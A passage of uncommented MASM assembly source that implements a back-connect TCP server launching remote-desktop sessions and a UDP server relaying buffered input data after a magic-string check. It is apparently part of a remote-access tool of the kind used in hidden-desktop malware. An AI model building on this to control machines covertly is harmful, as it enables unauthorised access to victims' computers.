InputClient  proto :dword
   
.code

;####################################################

BackConnectServer proc uses edi esi ebx dwPrt:dword


     LOCAL   sServerListen  : dword
     LOCAL   sClient        : dword
     LOCAL   thrIdc         : dword
     LOCAL   localaddr      : sockaddr_in
     LOCAL   dwvalk         : dword 
        

     invoke  socket, 2, 1, 6  
     .if eax != INVALID_SOCKET       
        mov    sServerListen, eax 
        mov    dwvalk, 1
        invoke setsockopt, sServerListen, 0FFFFh, 80h, addr dwvalk, 4
        mov    localaddr.sin_family, AF_INET
        mov    localaddr.sin_addr, INADDR_ANY
        invoke htons, dwPrt
        mov    localaddr.sin_port, ax
        invoke bind, sServerListen, addr localaddr, sizeof localaddr
        .if eax != SOCKET_ERROR                   
           invoke listen, sServerListen, 8
           .while (1)
              invoke accept, sServerListen, 0, 0
              .if eax == INVALID_SOCKET 
                 .break
              .endif                              
              mov     sClient, eax                                           
              invoke  CreateThread, 0, 0, addr BackConnectRemoteDesktop, sClient, 1, addr thrIdc  
              invoke  CloseHandle, eax                                                                                        
           .endw
        .endif
        invoke closesocket, sServerListen 
     .endif
     ret

BackConnectServer endp

;####################################################

BackConnectRemoteDesktop proc uses esi edi ebx dwipa:dword
           
        LOCAL   dther         : dword             
        LOCAL   ThsIdk        : dword
        LOCAL   lSockt        : dword 
        LOCAL   sins          : sockaddr_in  
        LOCAL   sissix        : dword
        LOCAL   dwport        : dword
        LOCAL   szldrr[50]    : byte
           
        mov     eax, dwipa
        mov     lSockt, eax           
        .if g_BackFlg == 1                          
           invoke  CheckServer, lSockt  
           .if eax == 1
              invoke CreateClientObj
              mov    ebx, eax                                                 
              mov    sissix, sizeof sockaddr_in
              invoke getpeername, lSockt,  addr sins, addr sissix
              mov    eax, sins.sin_addr             
              invoke inet_ntoa, eax 
              invoke lstrcpy, addr szldrr, eax
              movzx  eax, sins.sin_port
              invoke htons, ax
              movzx  eax, ax
              mov    dwport, eax                
              invoke AddConnectionInfo, ebx, lSockt, addr szldrr, dwport     
              invoke CreateThread, 0, 0, addr RemoteDesktop, ebx, 1, addr ThsIdk
              mov    dther, eax
              invoke WaitForSingleObject, dther, -1                                                                        
              invoke DeleteClientObj, ebx
           .endif          
        .endif
        invoke closesocket, lSockt                 
        ret

BackConnectRemoteDesktop endp        
         
;####################################################

UdpServer proc uses edi esi ebx this_:dword

     LOCAL   RecvBuff[100h] : byte
     LOCAL   SendBuff[600h] : byte
     LOCAL   sServerListen  : dword     
     LOCAL   message_len    : dword
     LOCAL   localaddr      : sockaddr_in   
     LOCAL   slen           : dword 
     LOCAL   client         : sockaddr_in
     LOCAL   tsiz           : dword
     LOCAL   Retval         : dword 
     LOCAL   optval         : dword
      
     mov     ebx, this_
     .while (dword ptr mCln.m_flStop != 1 )     
        invoke  socket, AF_INET, SOCK_DGRAM, IPPROTO_UDP  
        .if eax != INVALID_SOCKET       
           mov    sServerListen, eax         
           mov    mCln.m_hScUDP, eax        
;
           mov    localaddr.sin_family, AF_INET        
           mov    localaddr.sin_addr, INADDR_ANY       
           mov    eax, mCln.m_UDPort
           mov    localaddr.sin_port, ax
           invoke bind, mCln.m_hScUDP, addr localaddr, sizeof localaddr
           .if eax != SOCKET_ERROR                                                                                                         
              mov    slen,  sizeof sockaddr_in                          
              
              invoke recvfrom, mCln.m_hScUDP, addr RecvBuff, 100h, 0, addr client, addr slen
              mov    Retval, eax
              .if ( eax == SOCKET_ERROR)        
                 invoke WSAGetLastError                                                               
                 invoke closesocket, sServerListen 
                 .continue
              .endif                             

              lea    esi, SendBuff                                                                                                                                                                                                                        
              mov    [esi], dword ptr 12345678h 
              mov    tsiz, 4                 
              .if Retval != -1              
                 invoke lstrcmp, addr RecvBuff, addr sxiurf
                 .if eax  == 0                                                                                                                                                                               
                    lea    edi, [esi+4]
                    xor    eax, eax
                    mov    [edi], eax
                    invoke EnterCriticalSection, addr lpCriticalSection1  
                    invoke ReadInputData, ebx, edi
                    .if eax != 0
                       mov     ecx, sizeof INPUT_DATA  
                       mul     ecx
                       add     eax, 4
                       add     tsiz, eax                                                                   
                    .endif                                       
                    invoke LeaveCriticalSection, addr lpCriticalSection1                               
                 .endif
                 invoke sendto, mCln.m_hScUDP, addr SendBuff, tsiz, 0, addr client, sizeof sockaddr_in        
                 .if (eax == SOCKET_ERROR)                
                    invoke WSAGetLastError                                                    
                    invoke closesocket, sServerListen 
                    .continue
                 .endif                                                                         
             .endif                                                                    
           .endif                
           invoke closesocket, sServerListen 


        .endif
     .endw  
     mov    eax, 1
     ret

UdpServer endp

;####################################################

ReadInputData proc uses esi edi ebx  this_:dword, pData:dword

      mov     ebx, this_
      mov     esi, mCln.m_pIputArry
      mov     eax, [esi]          
      mov     edi, eax
      .if eax != 0
         mov     ecx, sizeof INPUT_DATA  
         mul     ecx 
         add     eax, 4
         invoke  memcpy, pData, mCln.m_pIputArry, eax
         xor     eax, eax
         mov     [esi], eax
      .endif
      mov     eax, edi
      ret

ReadInputData endp

;#############################################

SaveInputData proc uses esi edi ebx  this_:dword, pData:dword

      mov    ebx, this_      
      invoke EnterCriticalSection, addr lpCriticalSection1
      mov    esi, mCln.m_pIputArry      
      
      mov    eax, [esi]               
      mov    ecx, sizeof INPUT_DATA    
      mul    ecx       
      add    eax, 4              
      add    esi, eax                
      
      mov    ecx, pData          
      mov    eax, [ecx]
      mov    [esi], eax
      add    ecx, 4
      add    esi, 4
      
      mov    eax, [ecx]
      mov    [esi], eax 
      
      mov    esi, mCln.m_pIputArry
      inc    dword ptr [esi]
            
      invoke LeaveCriticalSection, addr lpCriticalSection1
      ret

SaveInputData endp

;############################################# 
